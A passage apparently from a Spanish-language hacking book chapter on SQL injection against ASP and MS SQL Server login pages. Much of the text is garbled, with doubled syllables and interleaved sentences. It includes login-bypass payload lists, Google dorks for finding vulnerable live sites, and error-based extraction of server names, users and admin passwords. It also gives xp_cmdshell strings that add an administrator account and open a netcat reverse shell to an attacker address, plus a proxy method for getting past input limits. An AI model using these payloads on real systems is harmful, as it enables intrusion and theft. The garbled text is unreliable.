
Mysql.  En http://dev.mysql.com/downloads/mysql/5.0.html, Mysql. En está disponible el servidor MySQL para practicar cómo crear databases y manipular su contenido sobre diversas plataformas.

El programador web medio, o quien fuera el desarrollador de ese script, en principio busca funcionalidad en la aplicación, es decir, que obtenga simplemente el resultado esperado o la acción. Luego intentará obtener un mejor diseño visual, que luzca bien ante los ojos del usuario. Recién por último se preocupará por la seguridad y cómo aplicarla de modo correcto. Es allí cuando nace el descuido, ya que generalmente implementa sólo algunas comprobaciones en los campos (algo muy normal que enseñan en los cursos de programación).

Otra Ot ras s cl clas ases es de in inye yecc cció ión n Las hay del tipo ORM, LDAP, XML (hacking SOAP), SSI, XPATH, e IMAP/SMTP. Podemos obtener más informa información ción en los siguient siguientes es sitios: www.owasp.org/in www.owasp.org/index.p dex.php/Te hp/Testing_ sting_for_OR for_OR-M_Injection, M_Injec tion, www.o www.owasp.o wasp.org/inde rg/index.php x.php/Testi /Testing_for_ ng_for_LDAP_In LDAP_Injection jection,, www.o www.owasp. wasp.org/inorg/index.php/Testing_for_XML_Injection y www.owasp.org/index.php/Testing_for_SSI_Injection.

165

 

Textfield.  Los

campos de datos son aquellos espacios

en los que escribimos la información que va a procesar el servidor (usuario, password y, a veces, otro tipo de datos personales o relativos al sitio).

Estoss ca Esto cam mpo poss sue uellen est staar ba bajjo de dete terrmin inaadas reg egllas de fi filltrado de desd sdee la mis ism ma pági pá gin na: ca carract cteeres esp speecia ialles es,, míni nim mos y máx áxiimos en cant ntiida dad d de letr traas o nú núm meros. Es ros. Esta tass re regl glas as pu pued eden en se serr el elud udid idas as fá fáci cilm lmen ente te me medi dian ante te la ma mani nipu pula laci ción ón de lo loss d a t o s e n t r á n s i t o ( a t r a v é s d e u n p r o x y c a m i no a l s e r v i d o r ) . La pr prim imer eraa le leyy de dell de desa sarr rrol olla lado dorr we web b en cu cuan anto to se segu guri rida dad d es ja  jamá  má s con f   i ar ar en q ue ue tod  tod os  os 

los us  us uari os os o visi visit  t antes antes int  int r  ro  du duci cirán rán los d at os os cor  cor rect  rect os os o es pera  perados dos d e  en  t r  ro  d e un f   ormu or mul l ari o onl  onl ine ; la segun segunda da regla regla es no creer que tod  tod os os l os os visi visit  t antes antes va yan a res res pet   pet ar ar l a sint  sint a xi s  s  de l a UR L d e consul consult  t a sin modi modi f    f   icar carl l a al real  real iz ar ar el quer  quer   y (pe (peti tición ción http).

Ejemplo Ejem plo de bypass bypass de acce acceso so  Veamos  Vea mos un ejemplo ejemplo de la técni técnica ca aplica aplicada da a un login login de auten autenti tifi fica cación ción o acce acceso. so. Dentro del archi Dentro archi vo  vo .asp de es este te acce acceso so a clientes clientes que veremos a continuación, se encon en contra trará rá la senten sentencia cia SQL o ruti rutina na de vali valida dación ción para para el acce acceso so hacia hacia una intra intra-net. Esta Esta acción acción pro ve  venien niente te de la orden orden o senten sentencia cia veri verifi fica cará rá que usuario, usuario, passpass-

 Var aria ian nte tes s

de si de sin nta taxi xis s

Es impor importan tante te recor recordar dar las varian variantes tes de sinta sintaxis xis (en inyec inyección) ción) según según el gestor gestor de data databa bases ses (MS-SQL, Mysql, Oracle, Oracle, PostgreSQL). PostgreSQL). Para Para encon encontrar trar infor informa mación, ción, pode podemos mos visi visitar tar http://se http://secu curity-pa rity-papers pers.glo .glo-bint.co bint .com.a m.ar/o r/ora racle cle_se _secu curity/sq rity/sql_in l_in jec  jectio tion_i n_in_o n_ora racle.php, cle.php, www.se www.secu curity rityfo focus cus.co .com/in m/info focus/1644, cus/1644, www.ti www .tizag zag.com/mysql .com/mysqlTu Tuto torial/mysql-php-sql-in rial/mysql-php-sql-in je  jecction. tion.php php y www www.post .postgresq gresql.org l.org/docs /docs/tech /techdocs.50. docs.50.

166

 

 word y cuenta cuenta sean los correc correctos tos para para dejar dejar acce acceder der al visi visitan tante te en caso caso de que tentenga e intro introduz duzca ca estos estos datos datos correc correcta tamen mente. te. En el códi código, go, se verá verá la sinta sintaxis xis trantransaccio sac cional nal SQL (a la data databa base) se) más o menos menos así: SELECT id FROM login WHERE usuario = ‘$usuario’ AND clave = ‘$clave’ AND cuenta = ‘$cuenta’

Login. Ac Acce ceso so a clientes clientes de un sitio sitio web elegi elegido do al azar de los tantos tantos que hay vulne vulnera rables bles en Inter Internet. net.

 Ahora bien, ¿cómo  Ahora ¿cómo el intru intruso so inyec inyecta tará rá una senten sentencia cia SQL en lugar lugar de colo colocar car usuausuario, pass word y cuen cuenta? ta? Es muy simple. simple. Si los campos campos de datos, datos, la aplica aplicación ción y el gestor ges tor de datos datos no están están sa sani nit  t iz ad os os (no esca esca pa a l os os cara  cara cte teres res es peci   peci al es) es) y asegu asegura ra-dos, se podrá podrá incluir incluir una comi comilla lla simple simple ‘ y segui seguido do a ella, el resto resto de lo que será será ininterpre ter preta tado do por el gestor gestor de base base de datos datos como como códi código go SQL.

167

 

SELECT id FROM login WHERE usuario = ‘admin’ AND clave = ‘’’OR 1=1 –  AND cuenta cuenta = 0303456

Un pación. pará ráme metro tro esmodo, pera rado, do,sicomo co esrio esta ta comi co cambia cambia com tamien miento to dedilaaplica apli cación. De no esteespe este mo do, elmo usua usuario esmilla, ellla, admin admin y tiene tieelnecompor un porta pass  word/con  word /condi ción, si 1 es igual a 1 (que por supues su puesto to lo es), éste éste será será vali valida dado do y tendrá tendrá acce acceso so a la intra intranet. net.

está el acce acceso so al panel panel del usuario usuario admi admin n lu lueego Adentro. Aquí está de inyec inyectar tarle le un pe peque queño ño códi código go SQL SQL ’OR ’OR 1=1 — den dentro tro del campo campo de clave. clave.

¿Qué inci inciden dencia cia tiene tiene esta esta vulne vulnera rabi bililidad dad en nuestro nuestro siste sistema? ma? Mucha. Mucha. Un intru intruso so que pueda pueda burlar burlar meca mecanis nismos mos ende endebles bles de segu seguri ridad dad en un sitio sitio con inte interac racción ción a data da taba bases ses y poste posterior riormen mente te logre logre inyec inyectar tar códi código go SQL, podrá podrá lle var a ca cabo bo accio accio-nes intru intrusi si vas  vas en el ser vi  vidor dor (y la red inter interna na si ésta ésta se encuen encuentra tra detrás), detrás), compro comprometer me ter infor informa mación, ción, destruir, destruir, copiar copiar o bien, modi modifi ficar. car. En se segu guri ridad dad infor informá máti tica, ca,  ject  t ion ion. ¿Cómo esta es ta técni técnica ca es cono conoci cida da como como SQL In jec ¿Cómo saber saber que un deter determi mina nado do campo cam po de datos datos o URL es vulne vulnera rable ble a la inyec inyección ción de códi código go SQL? Simple Simplemen mente te intentan inten tando do escri escribir bir y en viar una comi comilla lla simple simple para para obte obtener ner deter determi mina nado do error de siste sis tema. ma. Por supues supuesto, to, hay otros méto métodos, dos, pero pero ése es el más rápi rápido do y usu usual al.. El error origi origina nado do por la base base de datos datos se ve más o menos menos de esta esta mane manera: ra:

168

 

Error.

Error 80040e14: Unclo Unclosed sed quota quotation tion mark befo before re the charac character ter stri string ng es es,, quizás, quizás, el anuncio anuncio segu seguro ro de que la aplica aplicación ción es poten potencial cialmen mente te explo explota table ble en cuanto cuanto a inyec inyectar tar códi código go SQL.

En la siguien siguiente te imagen, imagen, pode podemos mos ver cómo cómo gene generar rar ese error a modo modo de compro compro-bar la existen existencia cia de la vulne vulnera rabi bili lidad dad o descui descuido: do:

Coloca Colo camos mos una comi comilla lla simpl simplee ‘ en el el cam campo Login de acce Login acceso so y, ac acto segui seguido, do, hace hacemos mos clic en Aceptar. Aceptar. Intento.

Buscar en Google Si busca buscamos mos en Google Google inurl:lo inurl:logi gin.a n.asp sp o inur inurll:bus :busca car.asp, r.asp, vamos vamos a tener tener como como resul resulta tado do canti can tida dades des de formu formula larios rios de acce acceso, so, links o campos campos de consul consulta ta de datos datos para para ver dichos dichos errores. erro res. Otros ejemplos ejemplos son: inurl:lo inurl:logi gin.asp, n.asp, site:.ar, site:.ar, intra intrane nett o uti utili lizar zar passwor password.asp, d.asp, concontrase tra sena.asp, na.asp, clave. clave.as asp p o in inti title:”ac tle:”acce ceso so restrin restringi gido”, do”, inti intitle:”ac tle:”acce ceso so cliente clientes” s” o si site:.asp. te:.asp.

169

 

 Ahora  Aho ra veamos veamos cómo cómo hacer hacer un bypass bypass (saltear) (saltear) de la pregun pregunta ta secre secreta: ta:

Salto. En el campo campo Login Login de acce acceso, so, colo coloca camos mos el nombre nombre

del usua usuario rio del que desea deseamos mos saber saber la clave clave y, en el campo campo Respues Respuesta ta (de la pregun pregunta ta secre secreta), ta), escri escribi bimos mos ‘OR 1=1 —. El resul resulta tado do es el retrie retrieve ve (el haber haber obte obteni nido) do) de la clave clave del usuario. usuario.

Información. El salto salto de la pregun pregunta ta secre secreta ta fue

posi po sible ble median mediante te la inyec inyección ción de un míni mínimo mo códi código go SQL.

Ejemplo Ejem plo sobre sobre la modi modifi fica cación ción de un URL.

170

 

Error.

Aquí se puede puede ver cómo, cómo, alte alteran rando do el URL con una comi comilla lla simple, simple, también también se logra logra repro reprodu ducir cir el error.

HISTO HIS TORIA RIA DE SQL INJEC INJECTION TION SQL Injec Injection tion se utili utiliza za hace hace más de 10 años. Incon Inconta tables bles bases bases de datos datos se han borra borra-do, alte altera rado do o roba robado do median mediante te esta esta técni técnica. ca. Muchos Muchos acce accesos sos y compro comproba bacio ciones nes han sisido burla burlados, dos, como como también también se han obte obteni nido do remo remota tamen mente te cuentas cuentas de máxi máximo mo pri vile  vile-gio dentro dentro de los ser vido  vidores. res.  Todo  To do esto esto a tra vé  véss del del ser ser vidor  vidor web (puerto (puerto 80 o servicio http) de un sitio. sitio. El pri primer mer tex texto pu/54/P publi blica cado do acer acerca cómo cómo hacerlo hacer lorest.puppy da.puppy data ta de diciem diyciembre bre de 1998 (www.ph rack.or rac k.org/ar g/archi chito  ves  ves/5 4/P54 54-08 -08), ),calode redac re dactó tó rain.fo rain .forest estaba esta ba dentro den tro de(www.phun texto textodedi de dica cado do a vulne vulnera rabi bililida dades des basa basadas das en tecno tecnolo logías gías NT. De este este docu documen mento, to, con vi  vieene prestar pres tar espe especial cial atención atención a la sección sección ODBC and MS SQL ser ver  ver 6.5. 6.5. Unos años después, después, luego luego de que este este tipo tipo de explo explota tación ción se discu discutió tió en algu algunos nos foros foros y congre congresos, sos, saldrían saldrían a la luz tres docu documen mentos tos (que es reco recomen menda dable ble estu estudiar diar y practi practicar) car) en los que se basa basaron ron casi casi la tota totalilidad dad de los textos textos que poste posterior riormen mente te se publi publica caron ron acerca acer ca del tema tema:: • Ad van  vanced ced SQL Injec Injection tion In SQL Ser ver  ver Ap Appli plica cations, tions, de Chris Chris Anley Anley (www(www.nextgenss .next genss.com .com/pa /paper pers/ad s/ad van  vanced_sq ced_sql_in l_injec jection.pdf). tion.pdf). • (more) Ad va  van nced SQL Injec Injection, tion, del mismo mismo autor autor (www.next (www.nextgenss genss.com .com/pa /papers pers/ / more_ad mo re_ad va  van nced_sq ced_sql_in l_injec jection.pdf). tion.pdf). • Mani nipu pula lating ting Micro Microsoft soft SQL Ser ver  ver Using Using SQL SQL In Injec jection, tion, de Cesar Cesar Cerru Cerrudo do

(ww w.app  w.appse secinc cinc.com .com/pre /presen senta tations tions/Ma /Mani nipu pula lating_SQL ting_SQL _Ser ver_U  ver_Using_SQ sing_SQ L_Injection.pdf).

171

 

Me Meto todo dolo logía gía Básica Bási camen mente, te, luego luego del carác carácter ter no filtra filtrado do (‘ o ;, parén parénte tesis sis en algu algunos nos casos casos –sin contar con tar las técni técnicas cas de evasión-), evasión-), es algo algo más que escri escribir bir puro puro códi código go SQL. En princi principi pio, o, hay hay que que en encon contrar trar un campo campo o punto punto vulne vulnera rable ble a la inyec inyección. ción. Ya sea un formu formula lario rio de acce acceso so user/pass, user/pass, uno de búsque búsqueda, da, de recu recupe pera ración ción de passpass word, de com compro proba bación ción de cualquier cualquier dato, dato, de contac contacto, to, link con varia variables, bles, links ocultos ocul tos al públi público co liga ligados dos a la DB, scripts y archi archi vos  vos de tes testeo, teo, CGIs por defec defecto, to, aplica apli cacio ciones nes del tipo tipo foro foro y otras de terce terceros ros públi públicas cas y licen licencia ciadas, das, ya sea vía mémétodo to do GET o POST.

este sitio, sitio, se expli explican can en deta detalle lle Querys. En este las dife diferen rencias cias entre entre los méto método doss GET GET y POST POST en cua cuan nto

a envío envío de la infor informa mación ción (www.cs.tut (www.cs.tut.fi/~j .fi/~jkor korpe pela la /forms /methods.html).  /methods.html).

Después, hacien Después, haciendo do una pre via de data da taba base se gathe gathering ring o tratan tratando do de mapear mapear cuáles cuáles son las data databa bases ses del ser vi  vidor, dor, los nombres, nombres, sus tablas, tablas, sus regis registros, tros, sus usuarios usuarios y sus pri vile  vilegios. gios. Gene General ralmen mente, te, se utili utiliza za HA VING y GROUP G ROUP BY pa para ra las priprimeras. me ras. Sobre Sobre la base base de esos datos, datos, se trata trata de ir arman ar mando do nuestras nuestras consul consultas tas ininyecta yec tadas, das, pulién puliéndo dolas, las, viendo viendo qué senten sentencias cias se pueden pueden utili utilizar, zar, si hay espa espacios cios de más, cómo cómo inte interac ractuar tuarlas. las. 172

 

Libro.

Para aprender muy bien el concepto de SQL y el comportamiento de la base de datos, es muy recomendable repasar el libro Aprendiendo Microsoft SQL Server 2000 en 21 Días, del autor Richard Waymire (Prentice Hall, ISBN: 970260124X)

¿Qué se puede puede hacer hacer con SQL Injec Injection? tion? El impac impacto to es en el ámbi ám bito to de la infor informa mación ción y del siste sistema ma opera operati ti vo,  vo, sal vo  vo en las ocasio ocasiones nes en las que el progra programa mador dor haya haya toma tomado do algu algunos nos recau recaudos dos o los ni veles  veles de pri vile  vile-gios que no nos permi permitan tan ejecu ejecutar tar algo. algo. Pero Pero si todo todo está está por defec defecto to y no hay rereglas de filtra filtrado, do, las posi posibi bililida dades des son innu innume mera rables. bles. Hay que tener tener un poco poco de perse perse ve  veran rancia cia (si gene genera ramos mos el error, probar probar de todo) todo) y agude agudeza. za. En cuanto cuanto a lo escri escrito to en docu documen mentos tos encon encontra trados dos en Google Google acerca acerca de esta esta técni técnica, ca, no es aplica apli cable ble en la mitad mi tad de los casos. ca sos. No hay que lle var a ca ca-bo un chequeo chequeo de segu seguri ridad dad en SQL Injec Injection tion basa basado do pura pura y exclu exclusi si vamen  vamente te en textos tex tos de Inter Internet. net. Si bien es fácil fácil aplicar aplicarlo lo desde desde un ad vi  visory sory de Bugtraq Bugtraq (cuando (cuando publi publican can una inyec inyec-ción deter determi mina nada da sobre sobre tal versión versión de una aplica aplicación), ción), no es lo mismo mismo que cuando cuando nos encon encontra tramos mos frente frente a una pági página na progra programa mada da en php/asp php/asp+da +data taba base, se, de autor autor y única. única. También También pode podemos mos leer estos estos textos textos bási básicos: cos: • • •

Gu Guía ía de de de_v2_spa pruebas prue baspanish OWASP v2.0  wasp.or p.org/i g/ima mages ges/2/2d/O /2/2d/O WASP _Tes  _Tes-ting _Gui  _Guide_v2_s nish _doc  _doc.zip). .zip).(ww w.o was CEH CE H v5 v5 Mo Modu dule le 14 SQL Injec Injection tion (módu (módulo lo educa educati ti vo).  vo). El wh white tepa paper per sobre sobre SQL Injec Injection tion (SQL Injec Injection tion Walkthrough) Walkthrough) de Secu Securi ri Team  Team (www.se (www .secu curi riteam team.com .com/se /secu curity rityre re views/5DP0N  views/5DP0N1P76E.html). 1P76E.html). • El texto de Stuart McDo McDonald nald en (www.go (www.go vern  vernment mentse secu curit rity.or y.org/ar g/arti ticles/SQ cles/SQLIn LIn-jection jec tionMo Mode deso sofAt fAttack tackDefenceandWhyItMatters.php). DefenceandWhyItMatters.php).

 Vale tener  Vale tener en cuenta cuenta que, en ningu ninguno no de ellos, encon encontra trare remos, mos, por ejemplo ejemplo que, papara sacar sacar el primer primer valor valor de una tabla tabla de pass words en texto texto plano plano (gene (general ralmen mente te es la de una cuenta cuenta de admi adminis nistra trador), dor), basta basta con sólo sólo poner poner ‘ OR nombre nombreta tabla=1 bla=1 -- a mo modo do deque atajo, atajo, sinmos tener tener que andar andar proban probando do largos largos UNION/SE UNION/SELECT LECT espe especia ciales. les. El error veremos vere será: será:

Micro Mi crosoft soft OLE DB Provi Provider der for ODBC Drivers Drivers error ‘800a0e07’ [Microsof [Micro soft][ODBC t][ODBC SQL Server Server Driver][SQL Driver][SQL Server]Syn Server]Syntax tax error conver converting ting the varchar var char value value ‘passde ‘passdelad ladmin’ min’ to a column column of data data type type int.

173

 

¿Muy simple no? Conviene intentarlo con otros nombres de tablas ya que, si practicamos lo suficiente y en muchos contextos, encontraremos atajos muy útiles, formas de resolución y evasión.  Veamos otros errores al inyectar código SQL en campos de datos: * Inyectado: ‘ and 1=convert(int,@@version)-Error: Microsoft OLE DB Provider for ODBC Drivers error '800a0e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2187 (Intel X86) Mar 7 2006 11:36:51 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on  Windows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int. Resultado: obtenemos la versión del servidor.

* Inyectado: ' and 1=convert(int,@@servername)-Error: Microsoft OLE DB Provider for ODBC Drivers error '800a0e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'GCIASISTEMAS' to a column of data type int. Resultado: Obtenemos el nombre del servidor. * Inyectado: ' and 1=convert(int,db_name(1))-Error: Microsoft OLE DB Provider for ODBC Drivers error '800a0e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'master' to a column of data type int. Resultado: Nombre de la primera database.

* Inyectado: ' and 1=convert(int,user_name(3))-Error: Microsoft OLE DB Provider for ODBC Drivers error '800a0e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'webmaster' to a column of data type int. Resultado: Nombre del tercer usuario (podemos variar el número para confeccionar una lista de todos). * Inyectado: ' and 1=convert(int,system_user)-Error: Microsoft OLE DB Provider for ODBC Drivers error '800a0e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'sa' to a column of data type int. Resultado: Nombre del usuario bajo el cual se ejecuta la aplicación de Database.

 Algunos  Algu nos ejemplos ejemplos de inyec inyección ción para para bypass bypass de acce accesos sos que pode podemos mos probar probar agreagregando gan do espa espacios, cios, parén parénte tesis sis o comi comillas llas simples simples son:

174

 

‘ ‘or 1 = 1 -‘ or 1=1 -or 1=1 -‘) or (‘a’=’a a’ or 1=1 -admin’-ad min’-‘ or 0=0 #

; ‘ or 1=1 -or 1=1 -“ or 1=1 -“) or (“a”=”a a’ or ‘a’=’a ‘ or 0=0 -“ or 0=0 #

‘; ‘or 1=1 -or 1=1 -‘ or a=a -a” or “a”=”a a’) or (‘a’=’a “ or 0=0 -or 0=0 #

‘-‘ or 1 = 1 -or 1 = 1 -“ or “a”=”a a” or 1=1 -a”) or (“a”=”a or 0=0 -)’or 1=1;

Evasión de reglas a nivel campo de datos Imaginemos que estamos frente a un login de dos campos típicos: usuario y  password. Éstos tienen una característica especial a modo de seguridad por parte del programador: en estos campos no pueden colocarse más que 6 caracteres alfanuméricos en cada uno. En este caso, la información seguiría este recorrido: usuario > página > database. Claramente, están filtrados desde el mismo código de la página, en donde veremos algo como maxLength="6". ¿Cómo saltamos esa comprobación? Modificando la información con la ayuda de un proxy y codificándola (no confundir codificar con cifrar), tal como lo requiere el submit, para luego enviarla

a la database: usuario > página > proxy (donde la modificaremos en tránsito u onthe-fly) > database. Para ello, necesitamos un grupo de herramientas de seguridad open source entre las que, actualmente, es muy recomendable la que podemos descargar de  www.ioactive.com/tools/IOATools-021805.exe.  www.ioactive.com/tools/IOATools-021805.e xe. Además, nos hará falta un buen browser, como Firefox. IOAcive Tools es un excelente kit de herramientas para chequeos de seguridad en aplicaciones web, compuesto por: • Snark: Sna un prox palroxy ador. ttack,Nos en donde don detirá mo modi difi fica care remos mos la infor in forma mación ción en(peti tránticio tránsi sito tones antes antes de querk: llegue lle gue sery vidor.  viat permiti permi rá modi mo difi ficar car y grabar gra bar los re request quest (pe ciones http). • Mo Morf rf:: es es un un en enco codea deador dor que codi codifi fica ca URL, Base64, Base64, html, viewsta viewstate, te, HEX (Perl y C Escenarios Escena rios La sinta sintaxis xis por inyec inyectar tar y el error que muestre muestre el server server esta estarán rán siempre siempre liga ligados dos a varia variables bles tales tales como como el progra pro grama mador dor que escri escribió bió el códi código go fuente fuente de la pági página na o aplica aplicación, ción, cómo cómo éste éste ha decla declara rado do sus varia variables bles y dise di seña ñado do la data databa base. se. La mane manera ra en que se admi adminis nistró tró el gestor gestor de base base de datos, datos, y los usuarios usuarios liga ligados dos a ello también también cuentan. cuentan. Son muchos muchos los esce escena narios, rios, todos todos sobre sobre contex contextos tos técni técnicos cos y de segu seguri ridad dad varia variados. dos.

175

 

array, md5, sha1, sql string, utf-7 y pem), aunque este caso caso sólo sólo utili utiliza zare remos mos el URL. aunque en este • Sashi himi: mi: se utili utiliza za para para en viar requests requests HTTP (es más cómo cómodo do que netcat). netcat).

IOActive.

Selec Se lección ción de compo componen nentes tes duran durante te la insta instala lación ción de IOActi IOActive ve Tools.

• IEproxy proxychan change: ge: útil para para setear setear el puerto puerto del proxy al que esta estará rá conec conecta tado do el browser brow ser nati nati vo  vo de Win Windows, dows, el cual no usare usa remos. mos. En este este ejemplo, ejemplo, sólo sólo utili utiliza zare remos mos Snark para para modi modifi ficar car la infor informa mación ción que va del proxy al ser vidor,  vidor, Morf para para codi codifi ficar car los datos datos y Fire Firefox fox (www.mo (www.mozi zilla-eu lla-euro rope.or pe.or-g/es/pro g/es /products ducts/fi /fire refox/). fox/).

Proce Pro cedi dimien miento to Una vez que tene tenemos mos las herra herramien mientas tas adecua adecuadas das e insta instala ladas, das, proce procede demos mos con la ejecu eje cución ción de Snark. En la siguien si guiente te figu figura, ra, pode podemos mos ver los tres prime primeros ros iconos iconos pulsa pul sados. dos. El prime primero ro signi signifi fica ca que el proxy está está conec conecta tado do al puerto puerto decla declara rado do en Local Lo cal Port (5858). El segun segundo, do, que se está está graban grabando do la sesión sesión y el terce tercero, ro, que popodremos dre mos editar editar todo todo lo que sube sube al ser ver  ver o da data taba base, se, en tiempo tiempo real. Luego Luego ejecu ejecu-tamos ta mos Fire Firefox, fox, vamos vamos hasta hasta el link del formu formula lari rio o y lo lo con confi figu gura ramos mos para para que se coconecte nec te al proxy local local (que monta monta Snark) y puerto puerto decla declara rado do en éste. éste. Para Para eso, vamos vamos aEnHerra He rramien mienta tas/Op s/Opcio nes/Red /Red/Con /Confi figu gura ración ción/Con figu gura ración Manual del Proxy. Manual los va valo lores res Proxyciones http, ponemos pone mos local lo calhost host y,/Confi en Puerto: Puer to:ción 5858. 176

 

Snark. In Inter terfaz faz gráfi gráfica ca de Snark. En la parte parte supe superior rior

izquier iz quierda da del progra programa, ma, vemos vemos los tres prime primeros ros iconos iconos pulsa pulsados. dos.

Coloca Colo camos mos en el campo campo un dato dato (x) a modo modo de refe referen rencia cia visual visual y lo en via  viamos mos dandando clic o con Enter. Enter. Snark apare aparece cerá rá como como en la figu figura ra que vemos vemos a conti continua nuación: ción:

Petición. Al apretar apretar el botón botón Ent Enter para enviar enviar los datos, datos, Snark abre

una panta pantalla lla para para editar editar el request. request. Allí reempla reemplaza zamos mos el valor valor que envia enviamos mos median me diante te el formu formula lario rio (x), colo colocan cando do el string codi codifi fica cado do como como muestra muestra la figu figura. ra.

Enco En cod dea eado do, , cod odi ifi fic cac ació ión n URL RL, , Url rlen enc cod ode ed    Los form formularios de datos datos envia enviados dos con el tipo tipo de cont contenido appli pliccation/x-www-form-ur tion/x-www-form-urlen lenccodedde deddeben ben ser cod codificados de la siguien siguiente te man manera: los nombres nombres de control control y los val valores serán serán esc escapados, los esp espacios serán serán reempla reemplazzados por símb sím bolos +y +y los ca carac ractteres reser reservvadosserán serán esc escapadoscomo como está estádescri descrito toenelRFC1738(www.rfc-e RFC1738 (www.rfc-es.org/rfc/rfc173 s.org/rfc/rfc17388es.txt), en la sección sección 2.2. Más infor inform mación sobre sobre form formularios en www.w3.org/TR/htm www.w3.org/TR/html4/in l4/intteract ract/forms.html. /forms.html.

177

 

ejemplo, plo, ‘OR 1=1 — queda quedaría ría de esta esta mane manera: ra: ‘OR+1%3D1+—. Esa con ver  ver-Por ejem sión se logra logra con la aplica aplicación ción Morf (Plain to URL). Por últi último, mo, presio presiona namos mos UpUpdate da te Content-Length Content-Length para para actua actualilizar zar la cantidad de datos datos por en viar y listo. listo. De ese modo, modo, habre habremos mos salta saltado do la segu seguri ridad dad del campo campo de dato dato inyec inyectan tando do el dodoble de los carac caracte teres res permi permititidos dos –más allá de alfa alfanu numé méri ricoscos- y, por otro lado, lado, logra logra-mos obte obtener ner algu alguna na infor informa mación ción impor importan tante te extraí extraída da basa basados dos en códi código go SQL inyec inyec-tado. ta do.

Ejemplos Ejem plos en el siste sistema ma opera operati tivo vo Éstos És tos son strings para para lograr lograr la ejecu ejecución, ción, a tra vés de xp_cmdshell xp_cmdshell (  Ex  Exten tended ded Stored  Stored   ), de coman co mandos dos de siste sistema: ma: Proce Pro cedu dure  re  master..xp_cmdshell hell ‘net user etico etico etico etico /add’;-- : Inser • ‘ exec master..xp_cmds Inserta ta un usuario usuario de siste sis tema. ma. master..xp_cmdshell hell ‘net local localgroup group admi adminis nistra trators tors etico etico /add’;-- : • ‘ exec master..xp_cmds  Al usuario usuario de siste sistema ma lo inte integra gra en el grupo grupo de admi adminis nistra trado dores. res. master..xp_cmdshell hell ‘nc direc direccio cionip nip puerto puerto -t -e cmd.e cmd.exe’;-xe’;-- : Expor • ‘ exec master..xp_cmds Expor-ta un prompt ms-dos vía netcat net cat a deter determi mina nado do puerto puerto y direc dirección ción IP de otra shell.

• );crea );create te table table systa systable bles(a s(a int identity,b identity,b varchar(1000)) varchar(1000)) insert insert into into systa systables bles exec master..xp_cmds master..xp_cmdshell hell ‘ipcon ‘ipconfig’-fig’-- : Crea una tabla tabla en la que luego luego guarda guarda el resul resulta tado do del coman comando do ipcon ipconfig. fig. Sólo usuarios Sólo usuarios del tipo tipo sysad sysadmin min (asigna (asignado do a la aplica aplicación ción que están están inyec inyectan tando) do) pueden pue den ejecu ejecutar tar xp_cmdshell xp_cmdshell y éste, éste, en caso caso de ser ejecu ejecuta tado, do, lo hará hará en el co conntex tex-to de segu seguri ridad dad en el que esté esté corrien corriendo do el ser vicio  vicio SQL. Como Como vemos, vemos, la cuestión cuestión de pri vile  vilegios gios en ser vicios  vicios y usuarios usuarios es deli delica cada. da. Ext Ex tended Stored Procedure

Para encon Para encontrar trar una expli explica cación ción de Micro Microsoft soft sobre sobre Exten Extended ded Stored Stored Proce Procedu dure re o Pro Pro-cedi ce dimien miento to Exten Extendi dido do Alma Almace cena nado do xp_cmdshell, xp_cmdshell, pode podemos mos visi visitar tar la direc di rección ción http://msdn.mi http://msdn .micro crosoft soft.com .com/li /library brary/de /defaul fault.as t.asp?ur p?url=/li l=/librar brary/en-us/tsql y/en-us/tsqlref/ts_x ref/ts_xp_aap_aasz_4jxo.asp. sz_4j xo.asp.

178

 

Strings. www.s www.string-func tring-functions tions.c .com om es un si sitio tio en donde donde se puede puede codi codifi ficar car un string SQL, entre entre otros tipos tipos de tareas tareas onli online. ne.

Herra He rramien mientas tas auto automa mati tiza zadas das Existen dece Existen decenas nas de herra herramien mientas tas que son capa capaces ces de traba trabajar jar de modo modo auto automa mati tiza za-do en algu algunos nos aspec aspectos tos de la inyec inyección ción de códi código go SQL. Estas herra Estas herramien mientas tas no son mági mágicas, cas, ya que por sí solas so las no pueden pueden hacer hacer mucho mucho sin la lógi lógica ca que le aplique apliquemos mos noso nosotros tros y el seteo seteo nece necesa sario rio para para que nos brinden brinden alalgún tipo tipo de venta ventaja ja en tiempo tiempo o resul resulta tado. do. Es con ve  venien niente te tomar tomarse se el tiempo tiempo que sea nece necesa sario rio y hace hacerr el el ch cheequeo de la aplica aplicación ción a mano. mano. Cuando Cuando nece necesi sita tamos mos auautoma to mati tizar zar algo algo (sabien (sabiendo do que pode podemos mos sacar sacar pro ve  vecho cho de ello), pode podemos mos usar las herra he rramien mientas tas que apare aparecen cen a conti continua nuación. ción.

Sqlnin Sql nin ja Su sitio sitio oficial oficial es: http://sqlnin http://sqlninja ja.sour .source cefor forge ge.net, .net, y sus carac caracte terís rísti ticas cas desta destaca cadas das (tradu (tra duci cidas das y testea testeadas) das) son: • Detec Detección ción vía finger fingerprint print del ser vidor  vidor SQL remo remoto: to: versión, versión, usuario usuario que ejecu ejecuta ta la aplica aplicación, ción, pri vile  vilegios gios de éste, éste, veri verifi fica ca dispo disponi nibi bililidad dad de xp_cmdshell xp_cmdshell y modo modo de 179

 

autenti auten tifi fica cación ción DB. • Brute force force del usuario usuario sa vía diccio dicciona nario rio e incre incremen mental. tal. • Creación de un xp_cmdshell xp_cmdshell si el origi original nal fue remo remo vi  vido. do. • Up Uplo load ad de ar archi chi vos,  vos, net netcat o cualquier cualquier ejecu ejecuta table ble utili utilizan zando do http requests requests sola solamen mente. te. • Esca caneo neo TCP/UDP TCP/UDP hacia hacia el atacan atacante te para para encon encontrar trar un puerto puerto y así pasar pasar a tratra vés del fi fire re wall desde des de la red ataca atacada, da, para para luego luego emplear emplear por allí una shell in ver  ver-sa. • Direc recta ta e in ver  versa sa bindshell, bindshell, TCP/UDP. TCP/UDP. • Pseudo dns shell tune tunelea leada da (dns-tunne (dns-tunneled), led), cuando cuando TCP/UDP TCP/UDP no están están dispo disponi ni-bles para para una shell direc directa ta o re ver  versa, sa, pero pero la DB puede puede resol resol ver  ver nom nombres bres exter exter-nos.

